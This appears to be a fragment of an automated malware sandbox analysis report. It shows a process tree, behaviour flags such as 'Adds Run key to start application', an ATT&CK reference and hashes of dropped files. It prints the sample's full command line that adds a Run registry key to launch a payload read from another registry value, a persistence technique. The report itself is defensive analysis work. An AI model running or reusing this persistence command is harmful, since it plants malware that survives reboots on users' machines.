C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"5⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:2652
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD55c220ed75280c181214fd09e1eed5be5
SHA18632a068505754d734915e2cdb4b23fca1324e3b
SHA2562c372644fac0b493dc938395727bcb7a2913955dbacbf50b577114ca63e73088
SHA5125422ee3ea40a6d1d9bd3617bc42fc6dbd9589f57e04bb72fa5518df5e64232ccc20ccb0a03b233770537feaffab1070491efd01c42f54f60a63b14da57e1c69a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YZGRX9C61X669HDJJLQ6.temp
Filesize7KB
MD52d98cb939b6fccc0c0b74478f518ba8d
SHA111902caa2dcc93e39cb0d8e3a059426ac2ff2962
SHA25678edc4b662409c595c12f41e08fd6eafc4a1a1fd822e3bb9f161e1c9f8ce7a7d
SHA512962538a76666473f0586740dcb2a8369ad5d810da161f7a15969e189e67dafbbe53c5eda80114301e3b174f781cd3de852d50fa3a76e9e609faad4f5a7d65f52
-
Filesize
475KB
MD5c990e3d829b26e351547c77df1bc5953
SHA1df0592b47bea01cc3199012205c3bf55545fb09e
SHA256f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
SHA512f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da